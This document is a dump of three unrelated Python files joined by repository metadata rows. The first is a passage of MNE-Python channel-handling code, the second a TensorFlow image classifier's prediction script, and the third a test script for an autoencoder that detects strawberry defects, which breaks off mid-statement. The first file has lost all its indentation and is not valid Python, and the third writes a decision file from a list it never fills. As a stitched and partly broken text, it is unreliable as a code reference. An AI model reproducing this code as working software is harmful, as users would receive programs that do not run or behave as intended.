# avoid circular imports
from ..time_frequency import AverageTFR, EpochsTFR
_check_preload(self, 'adding, dropping, or reordering channels')
if getattr(self, 'picks', None) is not None:
self.picks = self.picks[idx]
if hasattr(self, '_cals'):
self._cals = self._cals[idx]
pick_info(self.info, idx, copy=False)
if getattr(self, '_projector', None) is not None:
self._projector = self._projector[idx][:, idx]
# All others (Evoked, Epochs, Raw) have chs axis=-2
axis = -3 if isinstance(self, (AverageTFR, EpochsTFR)) else -2
self._data = self._data.take(idx, axis=axis)
return self
def add_channels(self, add_list, force_update_info=False):
"""Append new channels to the instance.
Parameters
----------
add_list : list
A list of objects to append to self. Must contain all the same
type as the current object
force_update_info : bool
If True, force the info for objects to be appended to match the
values in `self`. This should generally only be used when adding
stim channels for which important metadata won't be overwritten.
.. versionadded:: 0.12
Returns
-------
inst : instance of Raw, Epochs, or Evoked
The modified instance.
See Also
--------
drop_channels
"""
# avoid circular imports
from ..io import BaseRaw, _merge_info
from ..epochs import BaseEpochs
_validate_type(add_list, (list, tuple), 'Input')
# Object-specific checks
for inst in add_list + [self]:
_check_preload(inst, "adding channels")
if isinstance(self, BaseRaw):
con_axis = 0
comp_class = BaseRaw
elif isinstance(self, BaseEpochs):
con_axis = 1
comp_class = BaseEpochs
else:
con_axis = 0
comp_class = type(self)
for inst in add_list:
_validate_type(inst, comp_class, 'All input')
data = [inst._data for inst in [self] + add_list]
# Make sure that all dimensions other than channel axis are the same
compare_axes = [i for i in range(data[0].ndim) if i != con_axis]
shapes = np.array([dat.shape for dat in data])[:, compare_axes]
for shape in shapes:
if not ((shapes[0] - shape) == 0).all():
raise AssertionError('All data dimensions except channels '
'must match, got %s != %s'
% (shapes[0], shape))
# Create final data / info objects
data = np.concatenate(data, axis=con_axis)
infos = [self.info] + [inst.info for inst in add_list]
new_info = _merge_info(infos, force_update_to_first=force_update_info)
# Now update the attributes
self._data = data
self.info = new_info
if isinstance(self, BaseRaw):
self._cals = np.concatenate([getattr(inst, '_cals')
for inst in [self] + add_list])
return self
class InterpolationMixin(object):
"""Mixin class for Raw, Evoked, Epochs."""
@verbose
def interpolate_bads(self, reset_bads=True, mode='accurate',
verbose=None):
"""Interpolate bad MEG and EEG channels.
Operates in place.
Parameters
----------
reset_bads : bool
If True, remove the bads from info.
mode : str
Either ``'accurate'`` or ``'fast'``, determines the quality of the
Legendre polynomial expansion used for interpolation of MEG
channels.
verbose : bool, str, int, or None
If not None, override default verbose level (see
:func:`mne.verbose` and :ref:`Logging documentation <tut_logging>`
for more).
Returns
-------
inst : instance of Raw, Epochs, or Evoked
The modified instance.
Notes
-----
.. versionadded:: 0.9.0
"""
from .interpolation import _interpolate_bads_eeg, _interpolate_bads_meg
_check_preload(self, "interpolation")
if len(self.info['bads']) == 0:
warn('No bad channels to interpolate. Doing nothing...')
return self
_interpolate_bads_eeg(self)
_interpolate_bads_meg(self, mode=mode)
if reset_bads is True:
self.info['bads'] = []
return self
def rename_channels(info, mapping):
"""Rename channels.
.. warning:: The channel names must have at most 15 characters
Parameters
----------
info : dict
Measurement info.
mapping : dict | callable
a dictionary mapping the old channel to a new channel name
e.g. {'EEG061' : 'EEG161'}. Can also be a callable function
that takes and returns a string (new in version 0.10.0).
"""
info._check_consistency()
bads = list(info['bads']) # make our own local copies
ch_names = list(info['ch_names'])
# first check and assemble clean mappings of index and name
if isinstance(mapping, dict):
orig_names = sorted(list(mapping.keys()))
missing = [orig_name not in ch_names for orig_name in orig_names]
if any(missing):
raise ValueError("Channel name(s) in mapping missing from info: "
"%s" % np.array(orig_names)[np.array(missing)])
new_names = [(ch_names.index(ch_name), new_name)
for ch_name, new_name in mapping.items()]
elif callable(mapping):
new_names = [(ci, mapping(ch_name))
for ci, ch_name in enumerate(ch_names)]
else:
raise ValueError('mapping must be callable or dict, not %s'
% (type(mapping),))
# check we got all strings out of the mapping
for new_name in new_names:
_validate_type(new_name[1], 'str', 'New channel mappings')
bad_new_names = [name for _, name in new_names if len(name) > 15]
if len(bad_new_names):
raise ValueError('Channel names cannot be longer than 15 '
'characters. These channel names are not '
'valid : %s' % new_names)
# do the remapping locally
for c_ind, new_name in new_names:
for bi, bad in enumerate(bads):
if bad == ch_names[c_ind]:
bads[bi] = new_name
ch_names[c_ind] = new_name
# check that all the channel names are unique
if len(ch_names) != len(np.unique(ch_names)):
raise ValueError('New channel names are not unique, renaming failed')
# do the reampping in info
info['bads'] = bads
for ch, ch_name in zip(info['chs'], ch_names):
ch['ch_name'] = ch_name
info._update_redundant()
info._check_consistency()
def _recursive_flatten(cell, dtype):
"""Unpack mat files in Python."""
if len(cell) > 0:
while not isinstance(cell[0], dtype):
cell = [c for d in cell for c in d]
return cell
def read_ch_connectivity(fname, picks=None):
"""Parse FieldTrip neighbors .mat file.
More information on these neighbor definitions can be found on the related
FieldTrip documentation pages:
http://fieldtrip.fcdonders.nl/template/neighbours
Parameters
----------
fname : str
The file name. Example: 'neuromag306mag', 'neuromag306planar',
'ctf275', 'biosemi64', etc.
picks : array-like of int, shape (n_channels,)
The indices of the channels to include. Must match the template.
Defaults to None.
Returns
-------
ch_connectivity : scipy.sparse matrix, shape (n_channels, n_channels)
The connectivity matrix.
ch_names : list
The list of channel names present in connectivity matrix.
See Also
--------
find_ch_connectivity
Notes
-----
This function is closely related to :func:`find_ch_connectivity`. If you
don't know the correct file for the neighbor definitions,
:func:`find_ch_connectivity` can compute the connectivity matrix from 2d
sensor locations.
"""
from scipy.io import loadmat
if not op.isabs(fname):
templates_dir = op.realpath(op.join(op.dirname(__file__),
'data', 'neighbors'))
templates = os.listdir(templates_dir)
for f in templates:
if f == fname:
break
if f == fname + '_neighb.mat':
fname += '_neighb.mat'
break
else:
raise ValueError('I do not know about this neighbor '
'template: "{}"'.format(fname))
fname = op.join(templates_dir, fname)
nb = loadmat(fname)['neighbours']
ch_names = _recursive_flatten(nb['label'], string_types)
neighbors = [_recursive_flatten(c, string_types) for c in
nb['neighblabel'].flatten()]
assert len(ch_names) == len(neighbors)
if picks is not None:
if max(picks) >= len(ch_names):
raise ValueError('The picks must be compatible with '
'channels. Found a pick ({}) which exceeds '
'the channel range ({})'
.format(max(picks), len(ch_names)))
connectivity = _ch_neighbor_connectivity(ch_names, neighbors)
if picks is not None:
# picking before constructing matrix is buggy
connectivity = connectivity[picks][:, picks]
ch_names = [ch_names[p] for p in picks]
return connectivity, ch_names
def _ch_neighbor_connectivity(ch_names, neighbors):
"""Compute sensor connectivity matrix.
Parameters
----------
ch_names : list of str
The channel names.
neighbors : list of list
A list of list of channel names. The neighbors to
which the channels in ch_names are connected with.
Must be of the same length as ch_names.
Returns
-------
ch_connectivity : scipy.sparse matrix
The connectivity matrix.
"""
if len(ch_names) != len(neighbors):
raise ValueError('`ch_names` and `neighbors` must '
'have the same length')
set_neighbors = set([c for d in neighbors for c in d])
rest = set_neighbors - set(ch_names)
if len(rest) > 0:
raise ValueError('Some of your neighbors are not present in the '
'list of channel names')
for neigh in neighbors:
if (not isinstance(neigh, list) and
not all(isinstance(c, string_types) for c in neigh)):
raise ValueError('`neighbors` must be a list of lists of str')
ch_connectivity = np.eye(len(ch_names), dtype=bool)
for ii, neigbs in enumerate(neighbors):
ch_connectivity[ii, [ch_names.index(i) for i in neigbs]] = True
ch_connectivity = sparse.csr_matrix(ch_connectivity)
return ch_connectivity
def find_ch_connectivity(info, ch_type):
"""Find the connectivity matrix for the given channels.
This function tries to infer the appropriate connectivity matrix template
for the given channels. If a template is not found, the connectivity matrix
is computed using Delaunay triangulation based on 2d sensor locations.
Parameters
----------
info : instance of Info
The measurement info.
ch_type : str | None
The channel type for computing the connectivity matrix. Currently
supports 'mag', 'grad', 'eeg' and None. If None, the info must contain
only one channel type.
Returns
-------
ch_connectivity : scipy.sparse matrix, shape (n_channels, n_channels)
The connectivity matrix.
ch_names : list
The list of channel names present in connectivity matrix.
See Also
--------
read_ch_connectivity
Notes
-----
.. versionadded:: 0.15
Automatic detection of an appropriate connectivity matrix template only
works for MEG data at the moment. This means that the connectivity matrix
is always computed for EEG data and never loaded from a template file. If
you want to load a template for a given montage use
:func:`read_ch_connectivity` directly.
"""
if ch_type is None:
picks = channel_indices_by_type(info)
if sum([len(p) != 0 for p in picks.values()]) != 1:
raise ValueError('info must contain only one channel type if '
'ch_type is None.')
ch_type = channel_type(info, 0)
elif ch_type not in ['mag', 'grad', 'eeg']:
raise ValueError("ch_type must be 'mag', 'grad' or 'eeg'. "
"Got %s." % ch_type)
(has_vv_mag, has_vv_grad, is_old_vv, has_4D_mag, ctf_other_types,
has_CTF_grad, n_kit_grads, has_any_meg, has_eeg_coils,
has_eeg_coils_and_meg, has_eeg_coils_only) = _get_ch_info(info)
conn_name = None
if has_vv_mag and ch_type == 'mag':
conn_name = 'neuromag306mag'
elif has_vv_grad and ch_type == 'grad':
conn_name = 'neuromag306planar'
elif has_4D_mag:
if 'MEG 248' in info['ch_names']:
idx = info['ch_names'].index('MEG 248')
grad = info['chs'][idx]['coil_type'] == FIFF.FIFFV_COIL_MAGNES_GRAD
mag = info['chs'][idx]['coil_type'] == FIFF.FIFFV_COIL_MAGNES_MAG
if ch_type == 'grad' and grad:
conn_name = 'bti248grad'
elif ch_type == 'mag' and mag:
conn_name = 'bti248'
elif 'MEG 148' in info['ch_names'] and ch_type == 'mag':
idx = info['ch_names'].index('MEG 148')
if info['chs'][idx]['coil_type'] == FIFF.FIFFV_COIL_MAGNES_MAG:
conn_name = 'bti148'
elif has_CTF_grad and ch_type == 'mag':
if info['nchan'] < 100:
conn_name = 'ctf64'
elif info['nchan'] > 200:
conn_name = 'ctf275'
else:
conn_name = 'ctf151'
if conn_name is not None:
logger.info('Reading connectivity matrix for %s.' % conn_name)
return read_ch_connectivity(conn_name)
logger.info('Could not find a connectivity matrix for the data. '
'Computing connectivity based on Delaunay triangulations.')
return _compute_ch_connectivity(info, ch_type)
def _compute_ch_connectivity(info, ch_type):
"""Compute channel connectivity matrix using Delaunay triangulations.
Parameters
----------
info : instance of mne.measuerment_info.Info
The measurement info.
ch_type : str
The channel type for computing the connectivity matrix. Currently
supports 'mag', 'grad' and 'eeg'.
Returns
-------
ch_connectivity : scipy.sparse matrix, shape (n_channels, n_channels)
The connectivity matrix.
ch_names : list
The list of channel names present in connectivity matrix.
"""
from scipy.spatial import Delaunay
from .. import spatial_tris_connectivity
from ..channels.layout import _auto_topomap_coords, _pair_grad_sensors
combine_grads = (ch_type == 'grad' and FIFF.FIFFV_COIL_VV_PLANAR_T1 in
np.unique([ch['coil_type'] for ch in info['chs']]))
picks = dict(_picks_by_type(info, exclude=[]))[ch_type]
ch_names = [info['ch_names'][pick] for pick in picks]
if combine_grads:
pairs = _pair_grad_sensors(info, topomap_coords=False, exclude=[])
if len(pairs) != len(picks):
raise RuntimeError('Cannot find a pair for some of the '
'gradiometers. Cannot compute connectivity '
'matrix.')
xy = _auto_topomap_coords(info, picks[::2]) # only for one of the pair
else:
xy = _auto_topomap_coords(info, picks)
tri = Delaunay(xy)
neighbors = spatial_tris_connectivity(tri.simplices)
if combine_grads:
ch_connectivity = np.eye(len(picks), dtype=bool)
for idx, neigbs in zip(neighbors.row, neighbors.col):
for ii in range(2): # make sure each pair is included
for jj in range(2):
ch_connectivity[idx * 2 + ii, neigbs * 2 + jj] = True
ch_connectivity[idx * 2 + ii, idx * 2 + jj] = True # pair
ch_connectivity = sparse.csr_matrix(ch_connectivity)
else:
ch_connectivity = sparse.lil_matrix(neighbors)
ch_connectivity.setdiag(np.repeat(1, ch_connectivity.shape[0]))
ch_connectivity = ch_connectivity.tocsr()
return ch_connectivity, ch_names
def fix_mag_coil_types(info):
"""Fix magnetometer coil types.
Parameters
----------
info : dict
The info dict to correct. Corrections are done in-place.
Notes
-----
This function changes magnetometer coil types 3022 (T1: SQ20483N) and
3023 (T2: SQ20483-A) to 3024 (T3: SQ20950N) in the channel definition
records in the info structure.
Neuromag Vectorview systems can contain magnetometers with two
different coil sizes (3022 and 3023 vs. 3024). The systems
incorporating coils of type 3024 were introduced last and are used at
the majority of MEG sites. At some sites with 3024 magnetometers,
the data files have still defined the magnetometers to be of type
3022 to ensure compatibility with older versions of Neuromag software.
In the MNE software as well as in the present version of Neuromag
software coil type 3024 is fully supported. Therefore, it is now safe
to upgrade the data files to use the true coil type.
.. note:: The effect of the difference between the coil sizes on the
current estimates computed by the MNE software is very small.
Therefore the use of mne_fix_mag_coil_types is not mandatory.
"""
old_mag_inds = _get_T1T2_mag_inds(info)
for ii in old_mag_inds:
info['chs'][ii]['coil_type'] = FIFF.FIFFV_COIL_VV_MAG_T3
logger.info('%d of %d T1/T2 magnetometer types replaced with T3.' %
(len(old_mag_inds), len(pick_types(info, meg='mag'))))
info._check_consistency()
def _get_T1T2_mag_inds(info):
"""Find T1/T2 magnetometer coil types."""
picks = pick_types(info, meg='mag')
old_mag_inds = []
for ii in picks:
ch = info['chs'][ii]
if ch['coil_type'] in (FIFF.FIFFV_COIL_VV_MAG_T1,
FIFF.FIFFV_COIL_VV_MAG_T2):
old_mag_inds.append(ii)
return old_mag_inds
def _get_ch_info(info):
"""Get channel info for inferring acquisition device."""
chs = info['chs']
# Only take first 16 bits, as higher bits store CTF comp order
coil_types = set([ch['coil_type'] & 0xFFFF for ch in chs])
channel_types = set([ch['kind'] for ch in chs])
has_vv_mag = any(k in coil_types for k in
[FIFF.FIFFV_COIL_VV_MAG_T1, FIFF.FIFFV_COIL_VV_MAG_T2,
FIFF.FIFFV_COIL_VV_MAG_T3])
has_vv_grad = any(k in coil_types for k in [FIFF.FIFFV_COIL_VV_PLANAR_T1,
FIFF.FIFFV_COIL_VV_PLANAR_T2,
FIFF.FIFFV_COIL_VV_PLANAR_T3])
is_old_vv = ' ' in chs[0]['ch_name']
has_4D_mag = FIFF.FIFFV_COIL_MAGNES_MAG in coil_types
ctf_other_types = (FIFF.FIFFV_COIL_CTF_REF_MAG,
FIFF.FIFFV_COIL_CTF_REF_GRAD,
FIFF.FIFFV_COIL_CTF_OFFDIAG_REF_GRAD)
has_CTF_grad = (FIFF.FIFFV_COIL_CTF_GRAD in coil_types or
(FIFF.FIFFV_MEG_CH in channel_types and
any(k in ctf_other_types for k in coil_types)))
# hack due to MNE-C bug in IO of CTF
# only take first 16 bits, as higher bits store CTF comp order
n_kit_grads = sum(ch['coil_type'] & 0xFFFF == FIFF.FIFFV_COIL_KIT_GRAD
for ch in chs)
has_any_meg = any([has_vv_mag, has_vv_grad, has_4D_mag, has_CTF_grad,
n_kit_grads])
has_eeg_coils = (FIFF.FIFFV_COIL_EEG in coil_types and
FIFF.FIFFV_EEG_CH in channel_types)
has_eeg_coils_and_meg = has_eeg_coils and has_any_meg
has_eeg_coils_only = has_eeg_coils and not has_any_meg
return (has_vv_mag, has_vv_grad, is_old_vv, has_4D_mag, ctf_other_types,
has_CTF_grad, n_kit_grads, has_any_meg, has_eeg_coils,
has_eeg_coils_and_meg, has_eeg_coils_only)
def make_1020_channel_selections(info, midline="z"):
"""Return dict mapping from ROI names to lists of picks for 10/20 setups.
This passes through all channel names, and uses a simple heuristic to
separate channel names into three Region of Interest-based selections:
Left, Midline and Right. The heuristic is that channels ending on any of
the characters in `midline` are filed under that heading, otherwise those
ending in odd numbers under "Left", those in even numbers under "Right".
Other channels are ignored. This is appropriate for 10/20 files, but not
for other channel naming conventions.
If an info object is provided, lists are sorted from posterior to anterior.
Parameters
----------
info : instance of info
Where to obtain the channel names from. The picks will
be in relation to the position in `info["ch_names"]`. If possible, this
lists will be sorted by y value position of the channel locations,
i.e., from back to front.
midline : str
Names ending in any of these characters are stored under the `Midline`
key. Defaults to 'z'. Note that capitalization is ignored.
Returns
-------
selections : dict
A dictionary mapping from ROI names to lists of picks (integers).
"""
_validate_type(info, "info")
try:
from .layout import find_layout
layout = find_layout(info)
pos = layout.pos
ch_names = layout.names
except RuntimeError: # no channel positions found
ch_names = info["ch_names"]
pos = None
selections = dict(Left=[], Midline=[], Right=[])
for pick, channel in enumerate(ch_names):
last_char = channel[-1].lower() # in 10/20, last char codes hemisphere
if last_char in midline:
selection = "Midline"
elif last_char.isdigit():
selection = "Left" if int(last_char) % 2 else "Right"
else: # ignore the channel
continue
selections[selection].append(pick)
if pos is not None:
# sort channels from front to center
# (y-coordinate of the position info in the layout)
selections = {selection: np.array(picks)[pos[picks, 1].argsort()]
for selection, picks in selections.items()}
return selections
| 37.856937 | 79 | 0.59044 |
795ba7e9d56977e2fd4d2fa3d0226b8ee579a899 | 3,383 | py | Python | ai-engineer-deploying-solutions/module-iot/solution/modules/ImageClassifierService/app/predict.py | DSoftse/Pluralsight | 44bfb372a52815b7c86c1daefaf74542551c21a0 | [
"MIT"
] | 130 | 2017-07-07T21:01:32.000Z | 2022-03-17T11:51:26.000Z | ai-engineer-deploying-solutions/module-iot/solution/modules/ImageClassifierService/app/predict.py | DSoftse/Pluralsight | 44bfb372a52815b7c86c1daefaf74542551c21a0 | [
"MIT"
] | 8 | 2018-02-19T07:12:31.000Z | 2021-04-27T05:59:12.000Z | ai-engineer-deploying-solutions/module-iot/solution/modules/ImageClassifierService/app/predict.py | DSoftse/Pluralsight | 44bfb372a52815b7c86c1daefaf74542551c21a0 | [
"MIT"
] | 307 | 2017-02-17T04:45:02.000Z | 2022-02-23T17:42:07.000Z |
from urllib.request import urlopen
import tensorflow.compat.v1 as tf
from PIL import Image
import numpy as np
# import scipy
# from scipy import misc
import sys
import os
filename = 'model.pb'
labels_filename = 'labels.txt'
mean_values_b_g_r = (0,0,0)
size = (256, 256)
output_layer = 'loss:0'
input_node = 'Placeholder:0'
graph_def = tf.GraphDef()
labels = []
def initialize():
print('Loading model...',end=''),
with tf.gfile.FastGFile(filename, 'rb') as f:
graph_def.ParseFromString(f.read())
tf.import_graph_def(graph_def, name='')
print('Success!')
print('Loading labels...', end='')
with open(labels_filename, 'rt') as lf:
for l in lf:
l = l[:-1]
labels.append(l)
print(len(labels), 'found. Success!')
def crop_center(img,cropx,cropy):
y,x,z = img.shape
startx = x//2-(cropx//2)
starty = y//2-(cropy//2)
print('crop_center: ', x, 'x', y, 'to', cropx, 'x', cropy)
return img[starty:starty+cropy,startx:startx+cropx]
def predict_url(imageUrl):
print('Predicting from url: ',imageUrl)
with urlopen(imageUrl) as testImage:
# image = scipy.misc.imread(testImage)
image = Image.open(testImage)
return predict_image(image)
def predict_image(image):
print('Predicting image')
tf.reset_default_graph()
tf.import_graph_def(graph_def, name='')
with tf.Session() as sess:
prob_tensor = sess.graph.get_tensor_by_name(output_layer)
input_tensor_shape = sess.graph.get_tensor_by_name('Placeholder:0').shape.as_list()
network_input_size = input_tensor_shape[1]
# w = image.shape[0]
# h = image.shape[1]
w, h = image.size
print('Image size',w,'x',h)
# scaling
if w > h:
new_size = (int((float(size[1]) / h) * w), size[1], 3)
else:
new_size = (size[0], int((float(size[0]) / w) * h), 3)
# resize
if not (new_size[0] == w and new_size[0] == h):
print('Resizing to', new_size[0],'x',new_size[1])
#augmented_image = scipy.misc.imresize(image, new_size)
augmented_image = np.asarray(image.resize((new_size[0], new_size[1])))
else:
augmented_image = np.asarray(image)
# crop center
try:
augmented_image = crop_center(augmented_image, network_input_size, network_input_size)
except:
return 'error: crop_center'
augmented_image = augmented_image.astype(float)
# RGB -> BGR
red, green, blue = tf.split(axis=2, num_or_size_splits=3, value=augmented_image)
image_normalized = tf.concat(axis=2, values=[
blue - mean_values_b_g_r[0],
green - mean_values_b_g_r[1],
red - mean_values_b_g_r[2],
])
image_normalized = image_normalized.eval()
image_normalized = np.expand_dims(image_normalized, axis=0)
predictions, = sess.run(prob_tensor, {input_node: image_normalized})
result = []
idx = 0
for p in predictions:
truncated_probablity = np.float64(round(p,8))
if (truncated_probablity > 1e-8):
result.append({'Tag': labels[idx], 'Probability': truncated_probablity })
idx += 1
print('Results: ', str(result))
return result
| 29.938053 | 98 | 0.605971 |
795ba989a5085fe1f4f4fcfba0f04fb13bb45396 | 13,069 | py | Python | test.py | YisenLiu-Intelligent-Sensing/SSC_AE | 9aaed69808cd136cc443d8e7005ca2cf2aecfac4 | [
"MIT"
] | null | null | null | test.py | YisenLiu-Intelligent-Sensing/SSC_AE | 9aaed69808cd136cc443d8e7005ca2cf2aecfac4 | [
"MIT"
] | null | null | null | test.py | YisenLiu-Intelligent-Sensing/SSC_AE | 9aaed69808cd136cc443d8e7005ca2cf2aecfac4 | [
"MIT"
] | null | null | null | """
@file test.py
@brief Script for test
@author Yisen Liu
Copyright (C) 2021 Institute of Intelligent Manufacturing, Guangdong Academy of Sciences. All right reserved.
"""
import csv
import glob
import os
import sys
import numpy as np
import tensorflow as tf
from sklearn import metrics
import common as com
import SSC_AE_model
# load parameter.yaml
########################################################################
param = com.yaml_load()
#######################################################################
########################################################################
#save csv file
def save_csv(save_file_path,
save_data):
with open(save_file_path, "w", newline="") as f:
writer = csv.writer(f, lineterminator='\n')
writer.writerows(save_data)
#load normal train data
def load_normal_train_data(seed):
healthy_paths = glob.glob(os.path.join(param["data_directory"],"healthy*.npy"))
normal_data_mean = []
for p in healthy_paths:
normal_data_mean.append(np.load(p))
normal_data_mean = np.concatenate(normal_data_mean,axis=0)
#split train and test
np.random.seed(seed)
np.random.shuffle(normal_data_mean)
normal_train_data = normal_data_mean[0:normal_data_mean.shape[0]//2]
#normalization
com.normalize_data(normal_train_data)
return normal_train_data
#load normal test data
def load_normal_test_data(seed):
healthy_paths = glob.glob(os.path.join(param["data_directory"],"healthy*.npy"))
normal_data_mean = []
for p in healthy_paths:
normal_data_mean.append(np.load(p))
normal_data_mean = np.concatenate(normal_data_mean,axis=0)
#split train and test
np.random.seed(seed)
np.random.shuffle(normal_data_mean)
normal_test_data = normal_data_mean[normal_data_mean.shape[0]//2:]
#normalization
com.normalize_data(normal_test_data)
# define label
y_true_normal = np.zeros((normal_test_data.shape[0]))
return normal_test_data, y_true_normal
# load_abnormal_test_data
def load_abnormal_test_data():
data_file = os.path.join(param["data_directory"],'bruise_mean_2.npy')
abnormal_data_mean_1 = np.load(data_file)
print('bruise:',abnormal_data_mean_1.shape[0])
data_file = os.path.join(param["data_directory"],'decay_mean_2.npy')
abnormal_data_mean_2 = np.load(data_file)
print('decay:',abnormal_data_mean_2.shape[0])
data_file = os.path.join(param["data_directory"],'contamination_mean_2.npy')
abnormal_data_mean_3 = np.load(data_file)
print('contaminated:',abnormal_data_mean_3.shape[0])
abnormal_test_data = np.concatenate([abnormal_data_mean_1,abnormal_data_mean_2,abnormal_data_mean_3],axis=0)
print('abnormal:',abnormal_test_data.shape)
#define label
y_true_abnormal = np.ones((abnormal_test_data.shape[0]))
#normalization
com.normalize_data(abnormal_test_data)
com.normalize_data(abnormal_data_mean_1)
com.normalize_data(abnormal_data_mean_2)
com.normalize_data(abnormal_data_mean_3)
return abnormal_test_data, y_true_abnormal,abnormal_data_mean_1,abnormal_data_mean_2,abnormal_data_mean_3,abnormal_data_mean_1.shape[0],abnormal_data_mean_2.shape[0],abnormal_data_mean_3.shape[0]
# define cosine_similarity
def cosine_similarity(x1, x2):
if x1.ndim == 1:
x1 = x1[np.newaxis]
if x2.ndim == 1:
x2 = x2[np.newaxis]
x1_norm = np.linalg.norm(x1, axis=1)
x2_norm = np.linalg.norm(x2, axis=1)
cosine_sim = np.dot(x1, x2.T)/(x1_norm*x2_norm+1e-10)
return cosine_sim
########################################################################
# main test.py
########################################################################
if __name__ == "__main__":
#set GPU
os.environ['CUDA_VISIBLE_DEVICES'] = '2'
# make output result directory
os.makedirs(param["result_directory"], exist_ok=True)
auc_total = np.zeros((10))
prec_total = np.zeros((10))
recall_total = np.zeros((10))
f1_total = np.zeros((10))
ds_total = np.zeros((10))
acc_normal_total = np.zeros((10))
acc_bruise_total = np.zeros((10))
acc_decay_total = np.zeros((10))
acc_contaminated_total = np.zeros((10))
# initialize lines in csv for statistical result
csv_lines = []
# results by type
csv_lines.append(["AUC", "F1 score","ACC_normal","ACC_bruise","ACC_decay","ACC_contaminated"])
for itr in range (0,10):
# setup anomaly score file path
sample_type='strawberry'
anomaly_score_csv = "{result}/anomaly_score_{sample_type}_{itr}itr.csv".format(result=param["result_directory"],
sample_type=sample_type,itr=itr)
anomaly_score_list = []
# setup decision result file path
decision_result_csv = "{result}/decision_result_{sample_type}_{itr}itr.csv".format(result=param["result_directory"],
sample_type=sample_type,
itr=itr)
decision_result_list = []
# load test file
normal_test_data,y_true_normal = load_normal_test_data(seed=itr)
abnormal_test_data,y_true_abnormal,abnormal_data_mean_1,abnormal_data_mean_2,abnormal_data_mean_3,abnormal_size1,abnormal_size2,abnormal_size3 = load_abnormal_test_data()
y_true_normal=np.array(y_true_normal)
y_true_abnormal=np.array(y_true_abnormal)
y_true=np.concatenate([y_true_normal,y_true_abnormal],axis=0)
test_data=np.concatenate([normal_test_data,abnormal_test_data],axis=0)
normal_train_data=load_normal_train_data(itr)
with tf.Graph().as_default():
# Input tensor define
normal_input_tensor = tf.placeholder(tf.float32, shape=[None, normal_test_data.shape[1]],name='normal_input_tensor')
abnormal_input_tensor = tf.placeholder(tf.float32, shape=[None, normal_test_data.shape[1]],name='abnormal_input_tensor')
Discriminator_normal_label_tensor = tf.placeholder(tf.float32, shape=[None,2], name='Discriminator_normal_label_tensor')
Discriminator_abnormal_label_tensor = tf.placeholder(tf.float32, shape=[None,2], name='Discriminator_abnormal_label_tensor')
# Build AE
rebuilt_normal_data,code_normal_data=SSC_AE_model.AE(normal_input_tensor,reuse=tf.AUTO_REUSE)
rebuilt_abnormal_data,code_abnormal_data=SSC_AE_model.AE(abnormal_input_tensor,reuse=True)
# Build discriminator
dis_pred_normal = SSC_AE_model.discriminator(SSC_AE_model.AE(normal_input_tensor,reuse=True)[1],reuse=True)
dis_pred_abnormal = SSC_AE_model.discriminator(SSC_AE_model.AE(abnormal_input_tensor,reuse=True)[1],reuse=True)
vars = tf.trainable_variables()
#test step for AE model
def AE_test_step(sess, test_data):
feed_dict = {normal_input_tensor: test_data}
rebuilt_normal_data_value = sess.run(rebuilt_normal_data, feed_dict=feed_dict)
return rebuilt_normal_data_value
#test step for self-supervised classifier model
def Disc_test_step(sess, test_data):
feed_dict = {normal_input_tensor: test_data}
disc_pred_value = sess.run(dis_pred_normal, feed_dict=feed_dict)
return disc_pred_value
# test step for getting AE code
def Code_test_step(sess, test_data):
feed_dict = {normal_input_tensor:test_data}
code_pred_value = sess.run(code_normal_data, feed_dict=feed_dict)
code_pred_value = code_pred_value.reshape((code_pred_value.shape[0], code_pred_value.shape[1]))
return code_pred_value
print("============== MODEL LOAD ==============")
# set model path
sample_type = 'strawberry'
model_file = "{model}/model_SSC_AE_{sample_type}_{itr}itr.model".format(model=param["model_directory"],
sample_type=sample_type,itr=itr)
print(model_file)
print("\n============== BEGIN TEST ==============")
# load model file
with tf.Session() as sess:
#load model
model_saver = tf.train.Saver()
model_saver.restore(sess,model_file)
#testing
rebuilt_test_data = AE_test_step(sess, test_data=test_data)
disc_pred_test_data = Disc_test_step(sess, test_data=test_data)
code_pred_test_data = Code_test_step(sess, test_data=test_data)
train_code_vetor = Code_test_step(sess, test_data=normal_train_data)
# calculate rebuilt error
rebuilt_errors = -np.mean(np.square(test_data - rebuilt_test_data), axis=1)
#rebuilt rebuit cosine_similarity error
rebuilt_cosine_errors = []
train_rebuilt_vetor = AE_test_step(sess, test_data=normal_train_data)
for i in range(test_data.shape[0]):
cos_similarity = cosine_similarity( rebuilt_test_data[i], train_rebuilt_vetor) # shape(len(test), len(train))
rebuilt_cosine_errors.append(np.mean(cos_similarity))
errors = np.array(rebuilt_cosine_errors)
y_pred = -errors
for i in range(y_true.shape[0]):
anomaly_score_list.append([y_true[i], y_pred[i]])
y_pred = np.array(y_pred)
# save anomaly score
save_csv(save_file_path=anomaly_score_csv, save_data=anomaly_score_list)
com.logger.info("anomaly score result -> {}".format(anomaly_score_csv))
#make normal/abnormal decisions
decision = np.zeros((y_pred.shape[0]))
index = np.argsort(y_pred)
decision[index[0:normal_test_data.shape[0]]]=0
decision[index[normal_test_data.shape[0]:]]=1
# save decision results
save_csv(save_file_path=decision_result_csv, save_data=decision_result_list)
com.logger.info("decision result -> {}".format(decision_result_csv))
print("\n============ END OF TEST ============")
# caculate statistical results
auc = metrics.roc_auc_score(y_true, y_pred)
print('auc:',auc)
auc_total[itr]=auc
tn, fp, fn, tp = metrics.confusion_matrix(y_true, decision).ravel()
prec = tp / np.maximum(tp + fp, sys.float_info.epsilon)
recall = tp / np.maximum(tp + fn, sys.float_info.epsilon)
f1 = 2.0 * prec * recall / np.maximum(prec + recall, sys.float_info.epsilon)
print('prec:',prec)
print('recall:',recall)
print('f1:',f1)
prec_total[itr] = prec
recall_total[itr] = recall
f1_total[itr] = f1
acc_normal = 1 - np.sum(decision[0:y_true_normal.shape[0]]) / y_true_normal.shape[0]
acc_bruise = np.sum(decision[y_true_normal.shape[0]:y_true_normal.shape[0] + abnormal_size1]) / abnormal_size1
acc_decay = np.sum(decision[y_true_normal.shape[0] + abnormal_size1:y_true_normal.shape[0] + abnormal_size1 + abnormal_size2]) / abnormal_size2
acc_contaminated = np.sum(decision[y_true_normal.shape[0] + abnormal_size1 + abnormal_size2:]) / abnormal_size3
acc_normal_total[itr] = acc_normal
acc_bruise_total[itr] = acc_bruise
acc_decay_total[itr] = acc_decay
acc_contaminated_total[itr] = acc_contaminated
csv_lines.append(['strawberry_'+str(itr)+'runs', auc, f1, acc_normal, acc_bruise, acc_decay, acc_contaminated])
# statistical results for 10 runs
auc_mean = np.mean(auc_total)
prec_mean = np.mean(prec_total)
recall_mean = np.mean(recall_total)
f1_mean = np.mean(f1_total)
acc_normal_mean = np.mean(acc_normal_total)
